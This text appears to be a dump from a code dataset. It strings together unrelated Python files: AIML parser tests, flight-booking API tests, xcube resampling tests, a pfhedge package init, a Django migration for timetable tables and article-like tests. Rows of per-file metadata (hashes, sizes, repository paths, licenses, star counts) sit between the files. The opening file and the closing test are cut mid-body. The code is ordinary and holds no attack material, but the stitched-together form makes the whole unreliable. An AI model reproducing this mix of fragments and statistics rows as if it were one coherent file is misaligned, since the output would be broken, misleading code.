    self.assertIsNotNone(node.value)
    self.assertIsInstance(node.value, TemplateNode)
    self.assertFalse(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val3")

    # Branch 3: <bot> child -> BOT.
    node = template_node.children[3]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.BOT)
    self.assertFalse(node.loop)
    # Fixed: guard was missing for this branch only (present on siblings).
    self.assertIsNotNone(node.name)
    self.assertEqual(node.name.children[0].word, "name4")
    self.assertIsNotNone(node.value)
    self.assertIsInstance(node.value, TemplateNode)
    self.assertFalse(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val4")

    # Default branch.
    node = template_node.children[4]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.DEFAULT)
    self.assertFalse(node.loop)
    self.assertIsNone(node.name)
    self.assertIsNone(node.value)
    self.assertTrue(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val5")
def test_condition_template_Multi_type_duplicate(self):
    """An <li> may declare only one variable type; declaring both 'name'
    and 'var' on the same <li> must make the parser raise."""
    xml = """
        <template>
            <condition>
                <li name='name1' value="a" var="name">Val1 <loop /></li>
                <li value="b"><bot>name2</bot>Val2</li>
                <li bot="name3"><value>c</value>Val3</li>
                <li><bot>name4</bot><value>d</value>Val4</li>
                <li>Val5</li>
            </condition>
        </template>
        """
    with self.assertRaises(Exception):
        self._graph.parse_template_expression(ET.fromstring(xml))
def test_condition_template_invalid_tag(self):
    """A <condition> containing an unknown child tag (<lx>) must make the
    parser raise."""
    xml = """
        <template>
            <condition>
                <li name="name" value="a">Val1 <loop /></li>
                <li value="b"><bot>name2</bot>Val2</li>
                <li bot="name3"><value>c</value>Val3</li>
                <li><bot>name4</bot><value>d</value>Val4</li>
                <lx>Val5</lx>
            </condition>
        </template>
        """
    with self.assertRaises(Exception):
        self._graph.parse_template_expression(ET.fromstring(xml))
def test_condition_template_default_with_value(self):
    """A default-looking <li> (no variable name) that still carries a
    value attribute is invalid and must make the parser raise."""
    xml = """
        <template>
            <condition>
                <li name="name" value="a">Val1 <loop /></li>
                <li value="a">Val5</li>
            </condition>
        </template>
        """
    with self.assertRaises(Exception):
        self._graph.parse_template_expression(ET.fromstring(xml))
def test_condition_template_not_default_no_value(self):
    """A named <li> with no value (attribute or child) is invalid and must
    make the parser raise."""
    xml = """
        <template>
            <condition>
                <li name="name">Val1 <loop /></li>
                <li>Val5</li>
            </condition>
        </template>
        """
    with self.assertRaises(Exception):
        self._graph.parse_template_expression(ET.fromstring(xml))
| 43.641218
| 126
| 0.643962
| 8,743
| 87,457
| 6.307675
| 0.022075
| 0.102814
| 0.070973
| 0.07246
| 0.974559
| 0.973544
| 0.971586
| 0.96805
| 0.962229
| 0.961159
| 0
| 0.008844
| 0.242382
| 87,457
| 2,003
| 127
| 43.663005
| 0.823465
| 0.012681
| 0
| 0.942037
| 0
| 0
| 0.174037
| 0.02356
| 0
| 0
| 0
| 0
| 0.592572
| 1
| 0.0287
| false
| 0
| 0.003376
| 0
| 0.032639
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fa8ffadcf9eda821cdd6de82931e87253502e6dc
| 7,309
|
py
|
Python
|
tests/test_flight_ticket/test_get_flight_bookings.py
|
otseobande/flight-booker
|
5dce0efeb4f32553f9e33f88925189ec4f8e45d4
|
[
"Apache-2.0"
] | 2
|
2019-06-26T13:58:55.000Z
|
2019-07-07T09:28:40.000Z
|
tests/test_flight_ticket/test_get_flight_bookings.py
|
otseobande/flight-booker
|
5dce0efeb4f32553f9e33f88925189ec4f8e45d4
|
[
"Apache-2.0"
] | 12
|
2019-06-25T23:31:08.000Z
|
2021-05-06T19:37:34.000Z
|
tests/test_flight_ticket/test_get_flight_bookings.py
|
otseobande/flight-booker
|
5dce0efeb4f32553f9e33f88925189ec4f8e45d4
|
[
"Apache-2.0"
] | null | null | null |
import json, datetime
from api.models.user import User
from api.models.flight import Flight
from api.models.flight_ticket import FlightTicket
def test_it_return_401_if_authorization_header_is_not_passed(client):
    """A request with no Authorization header is rejected with 401."""
    response = client.get('/v1/flights/asdfasfasd/bookings', data=json.dumps({}))

    payload = json.loads(response.data)
    assert response.status_code == 401
    assert payload == {
        'status': 'error',
        'message': 'Token not provided or is invalid.'
    }
def test_it_should_return_404_if_flight_id_is_invalid(client):
    """A syntactically invalid flight id yields a 404 'Flight not found.'"""
    user = User(
        full_name='John Ade',
        phone_number='(324) 324 4234',
        address='1, afsfad, asdfasf.',
        email='johnade@gmail.com',
        password='password',
    )
    user.save()
    auth = {'Authorization': 'Bearer ' + user.generate_token()}

    response = client.get(
        '/v1/flights/asdfasfasd/bookings',
        data=json.dumps({}),
        headers=auth,
    )

    payload = json.loads(response.data)
    assert response.status_code == 404
    assert payload == {
        'status': 'error',
        'message': 'Flight not found.'
    }
def test_it_should_return_404_if_flight_is_not_found(client):
    """A well-formed id that matches no flight yields a 404."""
    user = User(
        full_name='John Ade',
        phone_number='(324) 324 4234',
        address='1, afsfad, asdfasf.',
        email='johnade@gmail.com',
        password='password',
    )
    user.save()
    auth = {'Authorization': 'Bearer ' + user.generate_token()}

    # A user id is a valid ObjectId but never a flight id.
    response = client.get(
        '/v1/flights/' + str(user.id) + '/bookings',
        headers=auth,
    )

    payload = json.loads(response.data)
    assert response.status_code == 404
    assert payload == {
        'status': 'error',
        'message': 'Flight not found.'
    }
def test_it_should_return_error_if_date_is_invalid(client):
    """A 'date' query param not in YYYY-MM-DD form yields a 400."""
    user = User(
        full_name='John Ade',
        phone_number='(324) 324 4234',
        address='1, afsfad, asdfasf.',
        email='johnade@gmail.com',
        password='password',
    )
    user.save()
    token = user.generate_token()

    flight = Flight(
        estimated_arrival_time='2014-12-22T03:12:58.019077+00:00',
        airline='Arik',
        departure_time='2014-12-22T03:12:58.019077+00:00',
        fare=50000,
        max_capacity=1,
        destination='Enugu',
        origin='Calabar',
    )
    flight.save()

    response = client.get(
        '/v1/flights/' + str(flight.id) + '/bookings?date=2012',
        headers={'Authorization': 'Bearer ' + token},
    )

    payload = json.loads(response.data)
    assert response.status_code == 400
    assert payload == {
        'status': 'error',
        'message': 'Date should be in YYYY-MM-DD format'
    }
def test_it_should_return_flight_bookings_successfully_if_date_is_passed(client):
    """Booking a ticket today and querying with today's date returns it,
    together with pagination metadata."""
    user = User(
        full_name='John Ade',
        phone_number='(324) 324 4234',
        address='1, afsfad, asdfasf.',
        email='johnade@gmail.com',
        password='password',
    )
    user.save()
    token = user.generate_token()

    flight = Flight(
        estimated_arrival_time='2014-12-22T03:12:58.019077+00:00',
        airline='Arik',
        departure_time='2014-12-22T03:12:58.019077+00:00',
        fare=50000,
        max_capacity=1,
        destination='Enugu',
        origin='Calabar',
    )
    flight.save()

    flight_ticket = FlightTicket(user=user, flight=flight)
    flight_ticket.save()

    today = datetime.datetime.today().strftime('%Y-%m-%d')
    response = client.get(
        '/v1/flights/' + str(flight.id) + '/bookings?date=' + today,
        headers={'Authorization': 'Bearer ' + token},
    )

    payload = json.loads(response.data)
    assert response.status_code == 200
    assert payload['status'] == 'success'

    ticket_ids = [t['id'] for t in payload['data']['flight_tickets']]
    assert str(flight_ticket.id) in ticket_ids

    meta = payload['data']['meta']
    for key in ('current_page', 'limit', 'total_items', 'no_of_pages'):
        assert key in meta
def test_it_should_return_flight_bookings_for_the_day_without_date_successfully(client):
    """Omitting 'date' defaults to today's bookings: a ticket created now
    is returned, together with pagination metadata."""
    user = User(
        full_name='John Ade',
        phone_number='(324) 324 4234',
        address='1, afsfad, asdfasf.',
        email='johnade@gmail.com',
        password='password',
    )
    user.save()
    token = user.generate_token()

    flight = Flight(
        estimated_arrival_time='2014-12-22T03:12:58.019077+00:00',
        airline='Arik',
        departure_time='2014-12-22T03:12:58.019077+00:00',
        fare=50000,
        max_capacity=1,
        destination='Enugu',
        origin='Calabar',
    )
    flight.save()

    flight_ticket = FlightTicket(user=user, flight=flight)
    flight_ticket.save()

    response = client.get(
        '/v1/flights/' + str(flight.id) + '/bookings',
        headers={'Authorization': 'Bearer ' + token},
    )

    payload = json.loads(response.data)
    assert response.status_code == 200
    assert payload['status'] == 'success'

    ticket_ids = [t['id'] for t in payload['data']['flight_tickets']]
    assert str(flight_ticket.id) in ticket_ids

    meta = payload['data']['meta']
    for key in ('current_page', 'limit', 'total_items', 'no_of_pages'):
        assert key in meta
def test_it_should_return_flight_bookings_successfully_if_pagination_params_are_invalid(client):
    """An empty 'page' query param is tolerated: the endpoint still
    responds 200 with bookings and pagination metadata."""
    user = User(
        full_name='John Ade',
        phone_number='(324) 324 4234',
        address='1, afsfad, asdfasf.',
        email='johnade@gmail.com',
        password='password',
    )
    user.save()
    token = user.generate_token()

    flight = Flight(
        estimated_arrival_time='2014-12-22T03:12:58.019077+00:00',
        airline='Arik',
        departure_time='2014-12-22T03:12:58.019077+00:00',
        fare=50000,
        max_capacity=1,
        destination='Enugu',
        origin='Calabar',
    )
    flight.save()

    flight_ticket = FlightTicket(user=user, flight=flight)
    flight_ticket.save()

    response = client.get(
        '/v1/flights/' + str(flight.id) + '/bookings?page=',
        headers={'Authorization': 'Bearer ' + token},
    )

    payload = json.loads(response.data)
    assert response.status_code == 200
    assert payload['status'] == 'success'

    ticket_ids = [t['id'] for t in payload['data']['flight_tickets']]
    assert str(flight_ticket.id) in ticket_ids

    meta = payload['data']['meta']
    for key in ('current_page', 'limit', 'total_items', 'no_of_pages'):
        assert key in meta
| 28.439689
| 139
| 0.606923
| 847
| 7,309
| 5.031877
| 0.145218
| 0.081652
| 0.049273
| 0.063351
| 0.905913
| 0.905913
| 0.879165
| 0.879165
| 0.869076
| 0.854294
| 0
| 0.05965
| 0.249966
| 7,309
| 256
| 140
| 28.550781
| 0.717804
| 0
| 0
| 0.773148
| 0
| 0
| 0.251608
| 0.075113
| 0
| 0
| 0
| 0
| 0.134259
| 1
| 0.032407
| false
| 0.037037
| 0.018519
| 0
| 0.050926
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3561aac2916e9c6cb2d8eb48039356aa17b752c9
| 8,454
|
py
|
Python
|
test/core/test_resample.py
|
SabineEmbacher/xcube
|
25863c713a27f1ecf6efb25ee0de8d322ab295bc
|
[
"MIT"
] | null | null | null |
test/core/test_resample.py
|
SabineEmbacher/xcube
|
25863c713a27f1ecf6efb25ee0de8d322ab295bc
|
[
"MIT"
] | null | null | null |
test/core/test_resample.py
|
SabineEmbacher/xcube
|
25863c713a27f1ecf6efb25ee0de8d322ab295bc
|
[
"MIT"
] | null | null | null |
import unittest
import numpy as np
import pandas as pd
from test.sampledata import new_test_dataset
from xcube.core.chunk import chunk_dataset
from xcube.core.resample import resample_in_time
from xcube.core.schema import CubeSchema
class ResampleInTimeTest(unittest.TestCase):
    """Tests for xcube.core.resample.resample_in_time on a small synthetic cube."""

    def setUp(self) -> None:
        """Build a 30-step cube with irregular time spacing (repeating
        1/1/3/4/2-day periods), linearly varying temperature/precipitation,
        chunked as time=1, lat=90, lon=180."""
        num_times = 30
        time = []
        periods = ['1D', '1D', '3D', '4D', '2D']
        t = pd.to_datetime('2017-07-01T10:30:15Z', utc=True)
        for i in range(num_times):
            time.append(t.isoformat())
            t += pd.to_timedelta(periods[i % len(periods)])
        # temperature rises 0.1/step from 272; precipitation falls 0.2/step from 120.
        temperature, precipitation = zip(*[(272 + 0.1 * i, 120 - 0.2 * i) for i in range(num_times)])
        input_cube = new_test_dataset(time, temperature=temperature, precipitation=precipitation)
        input_cube = chunk_dataset(input_cube, chunk_sizes=dict(time=1, lat=90, lon=180))
        self.input_cube = input_cube

    def test_resample_in_time_min_max(self):
        """2-weekly ['min', 'max'] resampling: checks derived variable names
        (<var>_min / <var>_max), dims, shapes, bin timestamps, per-bin
        extrema, and the resulting schema/chunking."""
        resampled_cube = resample_in_time(self.input_cube, '2W', ['min', 'max'])
        self.assertIsNot(resampled_cube, self.input_cube)
        self.assertIn('time', resampled_cube)
        self.assertIn('temperature_min', resampled_cube)
        self.assertIn('temperature_max', resampled_cube)
        self.assertIn('precipitation_min', resampled_cube)
        self.assertIn('precipitation_max', resampled_cube)
        self.assertEqual(('time',), resampled_cube.time.dims)
        self.assertEqual(('time', 'lat', 'lon'), resampled_cube.temperature_min.dims)
        self.assertEqual(('time', 'lat', 'lon'), resampled_cube.temperature_max.dims)
        self.assertEqual(('time', 'lat', 'lon'), resampled_cube.precipitation_min.dims)
        self.assertEqual(('time', 'lat', 'lon'), resampled_cube.precipitation_max.dims)
        self.assertEqual((6,), resampled_cube.time.shape)
        self.assertEqual((6, 180, 360), resampled_cube.temperature_min.shape)
        self.assertEqual((6, 180, 360), resampled_cube.temperature_max.shape)
        self.assertEqual((6, 180, 360), resampled_cube.precipitation_min.shape)
        self.assertEqual((6, 180, 360), resampled_cube.precipitation_max.shape)
        np.testing.assert_equal(resampled_cube.time.values,
                                np.array(
                                    ['2017-06-25T00:00:00Z', '2017-07-09T00:00:00Z',
                                     '2017-07-23T00:00:00Z', '2017-08-06T00:00:00Z',
                                     '2017-08-20T00:00:00Z', '2017-09-03T00:00:00Z'], dtype=np.datetime64))
        np.testing.assert_allclose(resampled_cube.temperature_min.values[..., 0, 0],
                                   np.array([272.0, 272.4, 273.0, 273.8, 274.4, 274.9]))
        np.testing.assert_allclose(resampled_cube.temperature_max.values[..., 0, 0],
                                   np.array([272.3, 272.9, 273.7, 274.3, 274.8, 274.9]))
        np.testing.assert_allclose(resampled_cube.precipitation_min.values[..., 0, 0],
                                   np.array([119.4, 118.2, 116.6, 115.4, 114.4, 114.2]))
        np.testing.assert_allclose(resampled_cube.precipitation_max.values[..., 0, 0],
                                   np.array([120.0, 119.2, 118.0, 116.4, 115.2, 114.2]))
        schema = CubeSchema.new(resampled_cube)
        self.assertEqual(3, schema.ndim)
        self.assertEqual(('time', 'lat', 'lon'), schema.dims)
        self.assertEqual((6, 180, 360), schema.shape)
        self.assertEqual((1, 90, 180), schema.chunks)

    def test_resample_in_time_p90_dask(self):
        """'percentile_90' on the chunked (dask) cube is expected to fail."""
        # "percentile_<p>" can currently only be used with numpy rather than chunked dask arrays:
        # TypeError raised on Windows, ValueError on Linux
        with self.assertRaises(Exception):
            # noinspection PyUnusedLocal
            resampled_cube = resample_in_time(self.input_cube, '2W', 'percentile_90')

    # TODO (forman): the call to resample_in_time() takes forever,
    # this is not xcube, but may be an issue in dask 0.14 or dask 2.8.
    # def test_resample_in_time_p90_numpy(self):
    #     # "percentile_<p>" can currently only be used with numpy, so compute() first:
    #     input_cube = self.input_cube.compute()
    #     resampled_cube = resample_in_time(input_cube, '2W', 'percentile_90')
    #     self.assertIsNot(resampled_cube, self.input_cube)
    #     self.assertIn('time', resampled_cube)
    #     self.assertIn('temperature_p90', resampled_cube)
    #     self.assertIn('precipitation_p90', resampled_cube)
    #     self.assertEqual(('time',), resampled_cube.time.dims)
    #     self.assertEqual(('time', 'lat', 'lon'), resampled_cube.temperature_p90.dims)
    #     self.assertEqual(('time', 'lat', 'lon'), resampled_cube.precipitation_p90.dims)
    #     self.assertEqual((6,), resampled_cube.time.shape)
    #     self.assertEqual((6, 180, 360), resampled_cube.temperature_p90.shape)
    #     self.assertEqual((6, 180, 360), resampled_cube.precipitation_p90.shape)
    #     np.testing.assert_equal(resampled_cube.time.values,
    #                             np.array(
    #                                 ['2017-06-25T00:00:00Z', '2017-07-09T00:00:00Z',
    #                                  '2017-07-23T00:00:00Z', '2017-08-06T00:00:00Z',
    #                                  '2017-08-20T00:00:00Z', '2017-09-03T00:00:00Z'], dtype=np.datetime64))
    #     np.testing.assert_allclose(resampled_cube.temperature_p90.values[..., 0, 0],
    #                                np.array([272.3, 272.9, 273.7, 274.3, 274.8, 274.9]))
    #     np.testing.assert_allclose(resampled_cube.precipitation_p90.values[..., 0, 0],
    #                                np.array([120.0, 119.2, 118.0, 116.4, 115.2, 114.2]))
    #
    #     schema = CubeSchema.new(resampled_cube)
    #     self.assertEqual(3, schema.ndim)
    #     self.assertEqual(('time', 'lat', 'lon'), schema.dims)
    #     self.assertEqual((6, 180, 360), schema.shape)
    #     self.assertEqual((1, 90, 180), schema.chunks)

    def test_resample_in_time_with_time_chunk_size(self):
        """time_chunk_size must override the time chunking of the result."""
        resampled_cube = resample_in_time(self.input_cube, '2D', ['min', 'max'], time_chunk_size=5)
        schema = CubeSchema.new(resampled_cube)
        self.assertEqual(3, schema.ndim)
        self.assertEqual(('time', 'lat', 'lon'), schema.dims)
        self.assertEqual((33, 180, 360), schema.shape)
        self.assertEqual((5, 90, 180), schema.chunks)

    def test_resample_f_all(self):
        """Frequency 'all' collapses the whole time axis into a single step
        holding the global min/max of each variable."""
        resampled_cube = resample_in_time(self.input_cube, 'all', ['min', 'max'])
        self.assertIsNot(resampled_cube, self.input_cube)
        self.assertIn('time', resampled_cube)
        self.assertIn('temperature_min', resampled_cube)
        self.assertIn('temperature_max', resampled_cube)
        self.assertIn('precipitation_min', resampled_cube)
        self.assertIn('precipitation_max', resampled_cube)
        self.assertEqual(('time',), resampled_cube.time.dims)
        self.assertEqual(('time', 'lat', 'lon'), resampled_cube.temperature_min.dims)
        self.assertEqual(('time', 'lat', 'lon'), resampled_cube.temperature_max.dims)
        self.assertEqual(('time', 'lat', 'lon'), resampled_cube.precipitation_min.dims)
        self.assertEqual(('time', 'lat', 'lon'), resampled_cube.precipitation_max.dims)
        self.assertEqual((1,), resampled_cube.time.shape)
        self.assertEqual((1, 180, 360), resampled_cube.temperature_min.shape)
        self.assertEqual((1, 180, 360), resampled_cube.temperature_max.shape)
        self.assertEqual((1, 180, 360), resampled_cube.precipitation_min.shape)
        self.assertEqual((1, 180, 360), resampled_cube.precipitation_max.shape)
        np.testing.assert_allclose(resampled_cube.temperature_min.values[..., 0, 0],
                                   np.array([272.0]))
        np.testing.assert_allclose(resampled_cube.temperature_max.values[..., 0, 0],
                                   np.array([274.9]))
        np.testing.assert_allclose(resampled_cube.precipitation_min.values[..., 0, 0],
                                   np.array([114.2]))
        np.testing.assert_allclose(resampled_cube.precipitation_max.values[..., 0, 0],
                                   np.array([120.0]))
        schema = CubeSchema.new(resampled_cube)
        self.assertEqual(3, schema.ndim)
        self.assertEqual(('time', 'lat', 'lon'), schema.dims)
        self.assertEqual((1, 180, 360), schema.shape)
| 57.510204
| 109
| 0.623137
| 1,053
| 8,454
| 4.825261
| 0.150047
| 0.161189
| 0.066916
| 0.060618
| 0.812832
| 0.78764
| 0.764023
| 0.757725
| 0.756938
| 0.63826
| 0
| 0.08457
| 0.234918
| 8,454
| 146
| 110
| 57.90411
| 0.700989
| 0.249468
| 0
| 0.40625
| 0
| 0
| 0.070376
| 0
| 0
| 0
| 0
| 0.006849
| 0.552083
| 1
| 0.052083
| false
| 0
| 0.072917
| 0
| 0.135417
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ea753f7e4e660d1b93502373271cc53e7971daa7
| 156
|
py
|
Python
|
pfhedge/stochastic/__init__.py
|
vishalbelsare/pfhedge
|
4d7ff173995e0795942bc6ec55f3fdc5bfb7a5f1
|
[
"MIT"
] | 81
|
2021-03-19T02:39:35.000Z
|
2022-03-29T07:59:50.000Z
|
pfhedge/stochastic/__init__.py
|
akira66/pfhedge
|
bc4ae304f9dc887b0e4d581f8ad42700a4eea9ad
|
[
"MIT"
] | 382
|
2021-05-04T16:08:38.000Z
|
2022-03-31T13:10:51.000Z
|
pfhedge/stochastic/__init__.py
|
akira66/pfhedge
|
bc4ae304f9dc887b0e4d581f8ad42700a4eea9ad
|
[
"MIT"
] | 32
|
2021-05-15T02:40:23.000Z
|
2022-03-27T10:08:11.000Z
|
from .brownian import generate_brownian
from .brownian import generate_geometric_brownian
from .cir import generate_cir
from .heston import generate_heston
| 31.2
| 49
| 0.871795
| 21
| 156
| 6.238095
| 0.333333
| 0.427481
| 0.274809
| 0.396947
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 156
| 4
| 50
| 39
| 0.935714
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
ea9e385bdd78ac0eb3d44984569b7f88df6b7235
| 3,895
|
py
|
Python
|
backend/uclapi/timetable/migrations/0015_crsavailmodulesa_crsavailmodulesb_crscompmodulesa_crscompmodulesb.py
|
balping/uclapi
|
57cb77a58a2f8fc5bb523b459fa074380f4d8dcc
|
[
"MIT"
] | null | null | null |
backend/uclapi/timetable/migrations/0015_crsavailmodulesa_crsavailmodulesb_crscompmodulesa_crscompmodulesb.py
|
balping/uclapi
|
57cb77a58a2f8fc5bb523b459fa074380f4d8dcc
|
[
"MIT"
] | null | null | null |
backend/uclapi/timetable/migrations/0015_crsavailmodulesa_crsavailmodulesb_crscompmodulesa_crscompmodulesb.py
|
balping/uclapi
|
57cb77a58a2f8fc5bb523b459fa074380f4d8dcc
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.18 on 2019-02-06 01:55
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Create the CrsavailmodulesA/B and CrscompmodulesA/B timetable tables.

    Auto-generated by Django 1.11.  The A and B variants of each model have
    identical schemas; NOTE(review): the A/B pairing looks like a
    double-buffering scheme for bulk reloads -- confirm against the app's
    data-loading code before relying on that.
    """

    dependencies = [
        ('timetable',
         '0014_auto_20190302_0232_squashed_0019_auto_20190305_1729'),
    ]

    operations = [
        # Available-modules tables: bucket A and bucket B share one schema.
        migrations.CreateModel(
            name='CrsavailmodulesA',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('setid', models.TextField(max_length=10)),
                ('courseid', models.TextField(max_length=12)),
                ('crsyear', models.BigIntegerField(blank=True, null=True)),
                ('groupnum', models.BigIntegerField(blank=True, null=True)),
                ('deptid', models.TextField(max_length=10, blank=True, null=True)),
                ('moduleid', models.TextField(max_length=12)),
                ('instid', models.BigIntegerField(blank=True, null=True)),
                ('semid', models.BigIntegerField(blank=True, null=True)),
                ('unitvalue', models.TextField(max_length=19, null=True, blank=True)),
                ('crsver', models.BigIntegerField(blank=True, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='CrsavailmodulesB',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('setid', models.TextField(max_length=10)),
                ('courseid', models.TextField(max_length=12)),
                ('crsyear', models.BigIntegerField(blank=True, null=True)),
                ('groupnum', models.BigIntegerField(blank=True, null=True)),
                ('deptid', models.TextField(max_length=10, blank=True, null=True)),
                ('moduleid', models.TextField(max_length=12)),
                ('instid', models.BigIntegerField(blank=True, null=True)),
                ('semid', models.BigIntegerField(blank=True, null=True)),
                ('unitvalue', models.TextField(max_length=19, null=True, blank=True)),
                ('crsver', models.BigIntegerField(blank=True, null=True)),
            ],
        ),
        # Crscompmodules tables: same columns as the avail tables except
        # that they omit 'groupnum'.
        migrations.CreateModel(
            name='CrscompmodulesA',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('setid', models.TextField(max_length=10)),
                ('courseid', models.TextField(max_length=12)),
                ('crsyear', models.BigIntegerField(blank=True, null=True)),
                ('deptid', models.TextField(max_length=10, blank=True, null=True)),
                ('moduleid', models.TextField(max_length=12)),
                ('instid', models.BigIntegerField(blank=True, null=True)),
                ('semid', models.BigIntegerField(blank=True, null=True)),
                ('unitvalue', models.TextField(max_length=19, null=True, blank=True)),
                ('crsver', models.BigIntegerField(blank=True, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='CrscompmodulesB',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('setid', models.TextField(max_length=10)),
                ('courseid', models.TextField(max_length=12)),
                ('crsyear', models.BigIntegerField(blank=True, null=True)),
                ('deptid', models.TextField(max_length=10, blank=True, null=True)),
                ('moduleid', models.TextField(max_length=12)),
                ('instid', models.BigIntegerField(blank=True, null=True)),
                ('semid', models.BigIntegerField(blank=True, null=True)),
                ('unitvalue', models.TextField(max_length=19, null=True, blank=True)),
                ('crsver', models.BigIntegerField(blank=True, null=True)),
            ],
        ),
    ]
| 49.303797
| 86
| 0.570475
| 372
| 3,895
| 5.873656
| 0.185484
| 0.107094
| 0.130892
| 0.171167
| 0.858124
| 0.858124
| 0.858124
| 0.858124
| 0.858124
| 0.858124
| 0
| 0.032131
| 0.280873
| 3,895
| 78
| 87
| 49.935897
| 0.747947
| 0.017715
| 0
| 0.816901
| 1
| 0
| 0.102276
| 0.014648
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028169
| 0
| 0.070423
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
57dee393fc1cb5463a9c4d2f6ebb1f0995523541
| 7,154
|
py
|
Python
|
authors/apps/articles/tests/test_like_articles.py
|
andela/ah-backend-spaces-
|
58e031a96a6b9555f1a4133cf8cb688c236d3f3b
|
[
"BSD-3-Clause"
] | 2
|
2018-08-17T15:47:36.000Z
|
2018-09-13T13:58:34.000Z
|
authors/apps/articles/tests/test_like_articles.py
|
andela/ah-backend-spaces-
|
58e031a96a6b9555f1a4133cf8cb688c236d3f3b
|
[
"BSD-3-Clause"
] | 35
|
2018-07-24T11:42:53.000Z
|
2021-06-10T20:34:41.000Z
|
authors/apps/articles/tests/test_like_articles.py
|
andela/ah-backend-spaces-
|
58e031a96a6b9555f1a4133cf8cb688c236d3f3b
|
[
"BSD-3-Clause"
] | 3
|
2018-07-17T13:05:35.000Z
|
2018-09-06T16:03:52.000Z
|
from .base import BaseTest, json
class LikeArticleTest(BaseTest):
    """Integration tests for the article like/dislike endpoints.

    Defect fixed: every test repeated the same article-creation POST and
    like/dislike request boilerplate; the shared steps are extracted into
    private helpers.  Test method names and assertions are unchanged.
    """

    def _create_article(self, auth_headers):
        """POST the fixture article as the authenticated user."""
        self.test_client.post(
            "/api/articles/", **auth_headers,
            data=json.dumps(self.article_to_create),
            content_type='application/json')

    def _send_like(self, auth_headers, article_id=1, body=None):
        """POST a like payload to the given article; return the response."""
        if body is None:
            body = self.article_to_like
        return self.test_client.post(
            "/api/articles/{}/likes/".format(article_id), **auth_headers,
            data=json.dumps(body), content_type='application/json')

    def _send_dislike_update(self, auth_headers, article_id=1):
        """PUT a dislike update to the given article; return the response."""
        return self.test_client.put(
            "/api/articles/{}/likes/".format(article_id), **auth_headers,
            data=json.dumps(self.article_to_dis_like),
            content_type='application/json')

    def _send_like_delete(self, auth_headers, article_id=1):
        """DELETE the like on the given article; return the response."""
        return self.test_client.delete(
            "/api/articles/{}/likes/".format(article_id), **auth_headers,
            data=json.dumps(self.article_to_dis_like),
            content_type='application/json')

    def test_getting_articles(self):
        """ test a user can get all likes """
        # GET is not an allowed method on the likes endpoint.
        auth_headers = self.user_logged_in
        self._create_article(auth_headers)
        response = self.test_client.get(
            "/api/articles/1/likes/", **auth_headers,
            content_type='application/json')
        self.assertEqual(response.status_code, 405)
        self.assertEqual(
            response.json()['article']['error'], "method GET not allowed")

    def test_liking_articles(self):
        """ test a user can like an article"""
        auth_headers = self.user_logged_in
        self._create_article(auth_headers)
        response = self._send_like(auth_headers)
        self.assertEqual(response.status_code, 200)

    def test_like_un_known_article(self):
        """Liking a non-existent article fails with 400."""
        auth_headers = self.user_logged_in
        self._create_article(auth_headers)
        response = self._send_like(auth_headers, article_id=1000)
        self.assertEqual(response.status_code, 400)

    def test_like_article_twice(self):
        """Liking the same article a second time fails with 400."""
        auth_headers = self.user_logged_in
        self._create_article(auth_headers)
        # like article 1 the first time
        self._send_like(auth_headers)
        # like article 1 the second time
        response = self._send_like(auth_headers)
        self.assertEqual(response.status_code, 400)

    def test_like_article_with_null(self):
        """A null like payload is rejected with 400."""
        auth_headers = self.user_logged_in
        self._create_article(auth_headers)
        response = self._send_like(auth_headers,
                                   body=self.null_article_to_like)
        self.assertEqual(response.status_code, 400)

    def test_can_update_like(self):
        """ test a user can like an article with a dislike"""
        auth_headers = self.user_logged_in
        self._create_article(auth_headers)
        self._send_like(auth_headers)
